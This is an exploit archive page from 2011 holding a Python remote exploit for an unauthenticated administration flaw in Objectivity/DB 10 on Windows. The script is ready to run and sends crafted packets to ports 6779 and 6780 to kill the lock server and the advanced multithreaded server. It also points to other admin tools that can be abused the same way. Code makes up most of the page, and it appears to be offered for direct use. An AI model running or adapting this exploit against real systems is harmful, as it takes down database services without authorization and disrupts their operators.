seeing is believing

Objectivity/DB Lack Of Authentication

Objectivity/DB Lack Of Authentication
Posted Jan 14, 2011
Authored by Jeremy Brown

Objectivity/DB includes many different tools for administration. The problem is, anyone can use these tools to perform operations on the host running the lock server, advanced multithreaded server, and probably it's other servers as well, without any authentication. This design flaw puts the host running these servers at risk of potentially unauthorized operations being performed on the system, locally or remotely. This exploit demonstrates this issue and was tested on Objectivity/DB 10 running on Windows.

tags | exploit
systems | windows
MD5 | b3a1c91160229b1a6518a12d9b050459

Objectivity/DB Lack Of Authentication

Change Mirror Download
#!/usr/bin/python
# obj.py
# Objectivity/DB Lack of Authentication Remote Exploit
# Jeremy Brown [0xjbrown41-gmail-com]
# Jan 2011
#
# "Objectivity, Inc. is a leader in distributed, scalable database technology.
# Our patented data management engine and persistent object store is the enabling
# technology powering some of the most complex applications and mission critical
# systems used in government, business and science organizations today."
#
# Objectivity/DB includes many different tools for administration. The
# problem is, anyone can use these tools to perform operations on the host
# running the lock server, advanced multithreaded server, and probably
# it's other servers as well, without any authentication. This design flaw
# puts the host running these servers at risk of potentially unauthorized
# operations being performed on the system, locally or remotely.
#
# This code demostrates a couple of the easiest operations to replicate
# by hand, like killing the lock and am servers. The suite contains lots
# of other admin tools that do various, more interesting tasks with the
# Objectivity/DB, such as oobackup, oonewfd, oodeletefd, oodebug, etc...
#
# Tested on Objectivity/DB 10 running on Windows
#
# Fixed version: N/A, US-CERT coordinated the communication and released
# a vulnerability note after the vendor did not provide additional feedback.
#
# http://www.kb.cert.org/vuls/id/782567
#

import sys
import socket

kill_ooams=(
"\x0d\x03"+
"\x00"*5+
"\x02"+
"\x00"*3+
"\x19\xf0\x92\xed\x89\xf4\xe8\x95\x43\x03"+
"\x00"*15+
"\x61\x62\x63"+
"\x00"+
"\x31\x32\x33\x34"+
"\x00"*3+
"\x05\x8c"+
"\x00"*3+
"\x0d"+
"\x00"*4
)

kill_ools=(
"\x0d\x03"+
"\x00"*5+
"\x77"+
"\x00"*3+
"\x04\xad\xc4\xae\xda\x9e\x48\xd6\x44\x03"+
"\x00"*15
)

if len(sys.argv)<3:
print "Objectivity/DB Remote Exploit"
print "Usage: %s <target> <operation>"%sys.argv[0]
print "\nWhat would you like to do?\n"
print "[1] Kill the advanced multithreaded server"
print "[2] Kill the lock server"
print "For other operations, check out oobackup, oodebug, etc"
sys.exit(0)

target=sys.argv[1]
op=int(sys.argv[2])

if((op<1)|(op>2)):
print "Invalid operation"
sys.exit(1)

if(op==1):
port=6779
data=kill_ooams

if(op==2):
port=6780
data=kill_ools

cs=target,port

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)

sock.send(data)

sock.close()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    2 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close